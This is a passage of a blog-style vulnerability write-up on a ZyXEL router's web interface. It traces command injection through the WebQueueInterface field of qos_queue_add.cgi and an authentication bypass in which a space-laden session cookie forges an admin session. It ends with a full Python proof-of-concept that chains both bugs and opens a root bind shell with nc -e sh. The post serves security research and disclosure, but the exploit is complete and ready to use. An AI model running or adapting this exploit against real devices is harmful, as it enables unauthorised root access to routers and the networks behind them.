<span style="color:#00f">if</span> (<span style="color:#000">zx</span>.<span style="color:#000">d</span>(<span style="color:#f00">$</span><span style="color:#000">v0_27</span>[<span style="color:#3af">2</span>].<span style="color:#000">b</span>) == <span style="color:#3af">0</span>)
    <span style="color:#000">var_10_1</span> = &amp;<span style="color:#000">data_403314</span>
<span style="color:#00f">else</span>
    <span style="color:#000">var_10_1</span> = &amp;<span style="color:#000">data_403310</span>
<span style="color:#000">templateSetVar</span>(<span style="color:#5a2">&#34;activechk&#34;</span>, <span style="color:#000">var_10_1</span>)
<span style="color:#00f">if</span> (<span style="color:#000">var_1ac_1</span> == <span style="color:#3af">1</span>)
    <span style="color:#000">templateSetVar</span>(<span style="color:#5a2">&#34;DefaultCheckDisable&#34;</span>, <span style="color:#5a2">&#34;disabled=&#34;</span><span style="color:#000">true</span><span style="color:#5a2">&#34;&#34;</span>)
<span style="color:#000">strcpy</span>(&amp;<span style="color:#000">qname</span>, <span style="color:#f00">$</span><span style="color:#000">v0_27</span> + <span style="color:#3af">0x11a</span>)
<span style="color:#000">templateSetVar</span>(<span style="color:#5a2">&#34;QName&#34;</span>, &amp;<span style="color:#000">qname</span>)
<span style="color:#000">strcpy</span>(&amp;<span style="color:#000">qname</span>, <span style="color:#f00">$</span><span style="color:#000">v0_27</span> + <span style="color:#3af">0xd</span>)
<span style="color:#00f">void</span> <span style="color:#000">command</span>
<span style="color:#000">sprintf</span>(&amp;<span style="color:#000">command</span>, <span style="color:#5a2">&#34;echo Interface is %s &gt;&gt; /var/web…&#34;</span>, &amp;<span style="color:#000">qname</span>)
<span style="color:#000">system</span>(&amp;<span style="color:#000">command</span>)
...
</code></pre></div><p>We see that we&rsquo;re using the <code>sprintf</code> command here, to read into <code>command</code> and then we run system, with this command. If we can control the <code>qname</code> here we&rsquo;ve won. We can read the <code>/var/webqos.txt</code>, and see that whenever we send a request to <code>qos_queue.cgi</code>. Another line gets added to the webqos.txt file. Specifically the text <code>WAN</code>. Playing around with the ZyXEL portal interface, we found out that we could go to Network Setting &gt; QoS &gt; Queue Setup, intercepting this request we see:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-fallback" data-lang="fallback">POST /qos_queue_add.cgi HTTP/1.1 
Host: 192.168.1.1 
Content-Length: 159 
Cache-Control: no-cache 
Pragma: no-cache 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 
Content-Type: application/x-www-form-urlencoded 
Accept: text/html, */* 
X-Requested-With: XMLHttpRequest 
If-Modified-Since: 0 
Expires: 0 
Origin: http://192.168.1.1 
Referer: http://192.168.1.1/indexMain.cgi 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: session=192.168.1.44 
Connection: close

Submit=Apply&amp;WebQueueActiveCfg=Active&amp;QueueObjectIndex=1&amp;
QueueNameTxt=WAN_Default_Queue&amp;WebQueueInterface=WAN&amp;
WebQueuePriority=3&amp;WebQueueWeight=1&amp;WebQueueRate=
</code></pre></div><p>We can see that the thing that matches our log file is sent in this request <code>WAN</code>. We try changing this to <code>AAAAAAAA</code>, reading the log file reveals&hellip; Success! Let&rsquo;s send another request with:
<code>WebQueueInterface=WAN;echo+'helloworld'+&gt;&gt;+/tmp/helloworld;</code>
We see that we have succesfully created a new file, we now have RCE.</p>
<h3 id="getting-a-reverse-shell">Getting a reverse shell</h3>
<p>Now we need to replace this with a proper reverse shell. This is really simple, and is just a simple <code>nc</code> command. We could use <code>nc -l -p 1337 -e 'sh'</code>, and then connect to the server on port 1337, and boom we&rsquo;re in. Now we just need to privilege escalate to root, and bypass authentication! Or&hellip;</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-fallback" data-lang="fallback">$ whoami
root
</code></pre></div><p>Well, seems like we&rsquo;re already root. Well.. Damn.. Let&rsquo;s look at getting an authentication bypass now.</p>
<h3 id="revshell-v20-added-authentication-bypass">RevShell v2.0, added authentication bypass!</h3>
<p>Looking for which server is responsible for authentication we found that there was a service running called <code>mini_httpd</code>, which was responsible for directing traffic to CGI binaries. In this binary there was code for checking whether a user was authenticated.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-c" data-lang="c"><span style="color:#00f">void</span> <span style="color:#000">ip_addr</span>
<span style="color:#00f">if</span> (<span style="color:#000">var_e40</span> != <span style="color:#3af">0</span>)
    <span style="color:#00f">int32_t</span> <span style="color:#000">stream</span> = <span style="color:#000">fopen</span>(&amp;<span style="color:#000">stream</span><span style="color:#f00">#</span>-<span style="color:#3af">1</span>, <span style="color:#5a2">&#34;r+&#34;</span>)
    <span style="color:#00f">if</span> (<span style="color:#000">stream</span> == <span style="color:#3af">0</span>)
        <span style="color:#000">var_e4c</span> = <span style="color:#3af">0</span>
        <span style="color:#00f">int32_t</span> <span style="color:#000">open_tmp_file</span> = <span style="color:#000">fopen</span>(&amp;<span style="color:#000">stream</span><span style="color:#f00">#</span>-<span style="color:#3af">1</span>, <span style="color:#5a2">&#34;w&#34;</span>)
        <span style="color:#00f">if</span> (<span style="color:#000">open_tmp_file</span> != <span style="color:#3af">0</span>)
            <span style="color:#000">_fprintf</span>(<span style="color:#000">open_tmp_file</span>, <span style="color:#5a2">&#34;0 %s NULL %d &#34;</span>, &amp;<span style="color:#000">session_cookie</span>, <span style="color:#3af">1</span>, <span style="color:#000">auth</span>)
            <span style="color:#000">_fclose</span>(<span style="color:#000">open_tmp_file</span>)
    <span style="color:#00f">else</span>
        <span style="color:#00f">void</span> <span style="color:#000">authorization</span>
        <span style="color:#000">auth</span> = &amp;<span style="color:#000">authorization</span>
        <span style="color:#00f">int32_t</span> <span style="color:#000">num</span>
        <span style="color:#00f">if</span> (<span style="color:#000">_fscanf</span>(<span style="color:#000">stream</span>, <span style="color:#5a2">&#34;%d %s %s &#34;</span>, &amp;<span style="color:#000">num</span>, &amp;<span style="color:#000">ip_addr</span>, <span style="color:#000">auth</span>) <span style="color:#000">s</span>&lt; <span style="color:#3af">3</span>)
            <span style="color:#000">var_e4c</span> = <span style="color:#3af">1</span>
            <span style="color:#000">_fclose</span>(<span style="color:#000">stream</span>)
            <span style="color:#000">_unlink</span>(&amp;<span style="color:#000">stream</span><span style="color:#f00">#</span>-<span style="color:#3af">1</span>)
        <span style="color:#00f">else</span>
            <span style="color:#00f">int32_t</span> <span style="color:#000">var_bf4</span>
            <span style="color:#000">_sysinfo</span>(&amp;<span style="color:#000">var_bf4</span>)
            <span style="color:#00f">if</span> (<span style="color:#000">_strcmp</span>(<span style="color:#000">check_file</span>(&amp;<span style="color:#000">data_42b9b8</span>), &amp;<span style="color:#000">ip_addr</span>) != <span style="color:#3af">0</span>)
                <span style="color:#000">_memcpy</span>(&amp;<span style="color:#000">authorization</span>, <span style="color:#5a2">&#34;NULL&#34;</span>, <span style="color:#3af">5</span>)
                <span style="color:#000">var_e4c</span> = <span style="color:#3af">0</span>
                <span style="color:#000">sub_401f10</span>(<span style="color:#000">stream</span>)
                <span style="color:#000">auth</span> = &amp;<span style="color:#000">authorization</span>
                <span style="color:#000">var_eac</span> = <span style="color:#3af">1</span>
                <span style="color:#000">_fprintf</span>(<span style="color:#000">stream</span>, <span style="color:#5a2">&#34;%d %s %s %d &#34;</span>, <span style="color:#000">var_bf4</span>, &amp;<span style="color:#000">ip_addr</span>, <span style="color:#000">auth</span>, <span style="color:#3af">1</span>)
                <span style="color:#000">_fclose</span>(<span style="color:#000">stream</span>)
            <span style="color:#00f">else</span>
                <span style="color:#00f">if</span> (<span style="color:#000">_strcmp</span>(&amp;<span style="color:#000">authorization</span>, <span style="color:#5a2">&#34;admin&#34;</span>) != <span style="color:#3af">0</span>)
                    <span style="color:#00f">if</span> (<span style="color:#000">_strcmp</span>(&amp;<span style="color:#000">authorization</span>, <span style="color:#5a2">&#34;user&#34;</span>) == <span style="color:#3af">0</span>)
</code></pre></div><p>This is the main part of the code, we&rsquo;re interested in. We can approach it with a bottom-up approach. We see that it checks the authorization string whether we&rsquo;re admin, or user. This authorization is used a few places. Checking with remote, we can see that there&rsquo;s files named accordingly to our ip addresses. Such that if my ip is <code>192.168.1.44</code>, and I&rsquo;m not logged in, it will create a file called <code>192.168.1.44</code> with the content: <code>some_number 192.168.1.44 NULL 0</code>, now we would like this to say <code>some_number 192.168.1.44 admin 0</code>, as this describes a logged in session. Let&rsquo;s continue. We see that we&rsquo;re using <code>fscanf</code> with three arguments, a number, then two strings. The way <code>fscanf</code> works is, reading from a file, it will populate the arguments after the format specifier. I.e. <code>fscanf(stream, N- format_specifiers, N- amount of arguments);</code>. Now we note that this logic is only reached if the file already exists. Right above the logic is described for creating the file. It will take the session cookie, and write into the file. This is the bug. We can actually send a session cookie with spaces in it, like so <code>AAA BBB CCC DDD EEE FFF GGG</code>, then when the <code>fscanf</code> later is called, we can now control the <code>ip</code>, and <code>auth</code>, etc.</p>
<h3 id="exploit-plan">Exploit plan</h3>
<ol>
<li>Create a request, to create this file (with malicious session)</li>
<li>Send a POST request with our payload, and the malicious session</li>
<li>It will now parse the fake <code>admin</code> we inserted, logging us in</li>
<li>The post request will contain the reverse shell</li>
<li>???</li>
<li>GG</li>
</ol>
<h1 id="final-proof-of-concept-script">Final Proof-of-Concept script</h1>
<p>(Note: Due to wrapping, you might need to scroll to the right to see the full request)</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-python" data-lang="python"><span style="color:#888;font-style:italic">#!/usr/bin/python3</span>

<span style="color:#00f">from</span> <span style="color:#000">pwn</span> <span style="color:#00f">import</span> *
<span style="color:#00f">import</span> <span style="color:#000">urllib.parse</span>
<span style="color:#00f">import</span> <span style="color:#000">requests</span>
<span style="color:#00f">import</span> <span style="color:#000">sys</span>

<span style="color:#00f">try</span>:
    <span style="color:#000">HOST</span> = <span style="color:#000">sys</span>.<span style="color:#000">argv</span>[<span style="color:#3af">1</span>]
<span style="color:#00f">except</span> <span style="color:#000">IndexError</span>: 
    <span style="color:#000">exit</span>(<span style="color:#5a2">&#34;Sorry I need your IP as argument to run, e.g. ./poc.py 192.168.1.44&#34;</span>)

<span style="color:#000">MALICIOUS</span> = <span style="color:#000">HOST</span> + <span style="color:#5a2">&#34; admin 0&#34;</span>
<span style="color:#000">COMMAND</span> = <span style="color:#000">urllib</span>.<span style="color:#000">parse</span>.<span style="color:#000">quote</span>(<span style="color:#5a2">&#34;nc -l -p 1337 -e &#39;sh&#39;&#34;</span>)

<span style="color:#000">print</span>(<span style="color:#5a2">f</span><span style="color:#5a2">&#34;[*] Attempting to create session file with evil session </span><span style="color:#5a2">{</span><span style="color:#000">MALICIOUS</span><span style="color:#5a2">}</span><span style="color:#5a2">&#34;</span>)
<span style="color:#000">r</span>=<span style="color:#000">requests</span>.<span style="color:#000">get</span>(<span style="color:#5a2">&#34;http://192.168.1.1/qos_queue_add.cgi&#34;</span>, <span style="color:#000">cookies</span>={<span style="color:#5a2">&#34;session&#34;</span>:<span style="color:#000">MALICIOUS</span>})

<span style="color:#000">req</span> = <span style="color:#5a2">f</span><span style="color:#5a2">&#34;&#34;&#34;POST /qos_queue_add.cgi HTTP/1.1
</span><span style="color:#5a2">Host: 192.168.1.1
</span><span style="color:#5a2">Content-Length: 159
</span><span style="color:#5a2">Cache-Control: no-cache
</span><span style="color:#5a2">Pragma: no-cache
</span><span style="color:#5a2">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
</span><span style="color:#5a2">Content-Type: application/x-www-form-urlencoded
</span><span style="color:#5a2">Accept: text/html, /
</span><span style="color:#5a2">X-Requested-With: XMLHttpRequest
</span><span style="color:#5a2">If-Modified-Since: 0
</span><span style="color:#5a2">Expires: 0
</span><span style="color:#5a2">Origin: http://192.168.1.1/
</span><span style="color:#5a2">Referer: http://192.168.1.1/indexMain.cgi
</span><span style="color:#5a2">Accept-Encoding: gzip, deflate
</span><span style="color:#5a2">Accept-Language: en-US,en;q=0.9
</span><span style="color:#5a2">Cookie: session=</span><span style="color:#5a2">{</span><span style="color:#000">MALICIOUS</span><span style="color:#5a2">}</span><span style="color:#5a2">
</span><span style="color:#5a2">Connection: close
</span><span style="color:#5a2">
</span><span style="color:#5a2">Submit=Apply&amp;WebQueueActiveCfg=Active&amp;QueueObjectIndex=1&amp;QueueNameTxt=WAN_Default_Queue&amp;WebQueueInterface=WAN;</span><span style="color:#5a2">{</span><span style="color:#000">COMMAND</span><span style="color:#5a2">}</span><span style="color:#5a2">;&amp;WebQueuePriority=3&amp;WebQueueWeight=1&amp;WebQueueRate=&#34;&#34;&#34;</span>.<span style="color:#000">encode</span>()

<span style="color:#000">print</span>(<span style="color:#5a2">f</span><span style="color:#5a2">&#34;[*] Now sending the payload to run following command (url-encoded): </span><span style="color:#5a2">{</span><span style="color:#000">COMMAND</span><span style="color:#5a2">}</span><span style="color:#5a2">&#34;</span>)
<span style="color:#000">io</span> = <span style="color:#000">remote</span>(<span style="color:#5a2">&#34;192.168.1.1&#34;</span>, <span style="color:#3af">80</span>)
<span style="color:#000">io</span>.<span style="color:#000">send</span>(<span style="color:#000">req</span>)
<span style="color:#000">io</span>.<span style="color:#000">close</span>()

<span style="color:#000">sleep</span>(<span style="color:#3af">1</span>)

<span style="color:#000">io</span> = <span style="color:#000">remote</span>(<span style="color:#5a2">&#34;192.168.1.1&#34;</span>, <span style="color:#3af">1337</span>)
<span style="color:#000">print</span>(<span style="color:#5a2">&#34;[*] Got shell!&#34;</span>)
<span style="color:#000">io</span>.<span style="color:#000">interactive</span>()
</code></pre></div><p>And:</p>
<p><img src="/pictures/result-payload.png" alt="result-payload"></p>
<h1 id="references">References</h1>
<p>[0]: <a href="https://en.wikipedia.org/wiki/Common_Gateway_Interface">https://en.wikipedia.org/wiki/Common_Gateway_Interface</a></p>

        </div>

        <div class="row middle-xs">
          <div class="col-xs-12">
            
          </div>
        </div>
        
          <div class="row">
            <div class="col-xs-12">
              
            </div>
          </div>

          



          
          
          <div style="height: 50px;"></div>
          
        

        <div class="site-footer">
  
  
</div>

      </div>
    </div>
  </article>

  

<script>
  
  
    
    
  
</script>

  

</body>

</html>